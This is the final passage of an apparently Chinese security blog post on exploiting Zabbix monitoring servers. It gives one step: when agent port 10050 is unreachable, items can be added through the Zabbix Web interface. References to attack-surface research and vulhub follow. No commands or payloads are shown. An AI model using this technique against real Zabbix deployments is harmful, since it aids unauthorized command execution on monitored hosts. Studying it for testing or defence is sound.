<p>如果在 Zabbix Proxy 场景或 Agent 主动检查模式的情况下，Zabbix Server 无法直接与 Agent  10050 端口通讯，可以使用比较通用的办法，就是通过 Zabbix Web 添加监控项。</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221735740.jpg-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221735740.jpg-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221735740.jpg-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221735740.jpg-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221735740.jpg-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221735740.jpg-water_print" /></p>
<p>其它配置同理，在此不做赘述。</p>
<h2 id="参考">参考</h2>
<ul>
<li><a href="http://noahblog.360.cn/zabbixgong-ji-mian-wa-jue-yu-li-yong/" target="_blank" rel="noopener noreffer">Zabbix 攻击面挖掘与利用</a></li>
<li><a href="https://github.com/vulhub/vulhub" target="_blank" rel="noopener noreffer">vulhub</a></li>
<li><a href="https://www.zabbix.com/documentation/current/zh/manual" target="_blank" rel="noopener noreffer">Zabbix 手册</a></li>
<li><a href="https://www.cnblogs.com/readygood/p/9650934.html" target="_blank" rel="noopener noreffer">Zabbix监控原理及架构</a></li>
</ul>
</div><div class="post-footer" id="post-footer">
    <div class="post-info">
        <div class="post-info-line">
            <div class="post-info-mod">
                <span>更新于 2022-03-21</span>
            </div>
            <div class="post-info-license"></div>
        </div>
        <div class="post-info-line">
            <div class="post-info-md"></div>
            <div class="post-info-share">
                <span><a href="javascript:void(0);" title="分享到 微博" data-sharer="weibo" data-url="https://www.geekby.site/2022/03/zabbix%E6%BC%8F%E6%B4%9E%E6%B7%B1%E5%85%A5%E5%88%A9%E7%94%A8/" data-title="Zabbix 漏洞深入利用"><i class="fab fa-weibo fa-fw"></i></a><a href="javascript:void(0);" title="分享到 Evernote" data-sharer="evernote" data-url="https://www.geekby.site/2022/03/zabbix%E6%BC%8F%E6%B4%9E%E6%B7%B1%E5%85%A5%E5%88%A9%E7%94%A8/" data-title="Zabbix 漏洞深入利用"><i class="fab fa-evernote fa-fw"></i></a><a href="javascript:void(0);" title="分享到 Skype" data-sharer="skype" data-url="https://www.geekby.site/2022/03/zabbix%E6%BC%8F%E6%B4%9E%E6%B7%B1%E5%85%A5%E5%88%A9%E7%94%A8/" data-title="Zabbix 漏洞深入利用"><i class="fab fa-skype fa-fw"></i></a></span>
            </div>
        </div>
    </div>

    <div class="post-info-more">
        <section class="post-tags"><i class="fas fa-tags fa-fw"></i>&nbsp;<a href="/tags/zabbix/">Zabbix</a>,&nbsp;<a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">漏洞复现</a></section>
        <section>
            <span><a href="javascript:void(0);" onclick="window.history.back();">返回</a></span>&nbsp;|&nbsp;<span><a href="/">主页</a></span>
        </section>
    </div>

    <div class="post-nav"><a href="/2022/03/%E5%AF%B9%E8%B1%A1%E5%AD%98%E5%82%A8%E6%94%BB%E9%98%B2%E6%A1%88%E4%BE%8B/" class="prev" rel="prev" title="对象存储攻防案例"><i class="fas fa-angle-left fa-fw"></i>对象存储攻防案例</a>
            <a href="/2022/03/spring-beans-rce%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" class="next" rel="next" title="Spring beans RCE 漏洞分析">Spring beans RCE 漏洞分析<i class="fas fa-angle-right fa-fw"></i></a></div>
</div>
</article></div>
            </main><footer class="footer">
        <div class="footer-container"><div class="footer-line"><i class="far fa-copyright fa-fw"></i><span itemprop="copyrightYear">2019 - 2022</span><span class="author" itemprop="copyrightHolder">&nbsp;<a href="/" target="_blank">Geekby</a></span>&nbsp;|&nbsp;<span class="license"><a rel="license external nofollow noopener noreffer" href="https://creativecommons.org/licenses/by-nc/4.0/" target="_blank">CC BY-NC 4.0</a></span></div>
        </div>
    </footer></div>

        <div id="fixed-buttons"><a href="#" id="back-to-top" class="fixed-button" title="回到顶部">
                <i class="fas fa-arrow-up fa-fw"></i>
            </a><a href="#" id="view-comments" class="fixed-button" title="查看评论">
                <i class="fas fa-comment fa-fw"></i>
            </a>
        </div><link rel="stylesheet" href="/lib/lightgallery/lightgallery.min.css"><script type="text/javascript" src="/lib/smooth-scroll/smooth-scroll.min.js"></script><script type="text/javascript" src="/lib/autocomplete/autocomplete.min.js"></script><script type="text/javascript" src="/lib/algoliasearch/algoliasearch-lite.umd.min.js"></script><script type="text/javascript" src="/lib/lazysizes/lazysizes.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lightgallery.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lg-thumbnail.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lg-zoom.min.js"></script><script type="text/javascript" src="/lib/clipboard/clipboard.min.js"></script><script type="text/javascript" src="/lib/sharer/sharer.min.js"></script><script type="text/javascript">window.config={"code":{"copyTitle":"复制到剪贴板","maxShownLines":100},"comment":{},"lightGallery":{"actualSize":false,"exThumbImage":"data-thumbnail","hideBarsDelay":2000,"selector":".lightgallery","speed":400,"thumbContHeight":80,"thumbWidth":80,"thumbnail":true},"search":{"algoliaAppID":"C19A58DMI2","algoliaIndex":"blog","algoliaSearchKey":"a7203b4397475a3fcf49cea4495e0987","highlightTag":"em","maxResultLength":10,"noResultsFound":"没有找到结果","snippetLength":50,"type":"algolia"}};</script><script type="text/javascript" src="/js/theme.min.js"></script></body>
</html>
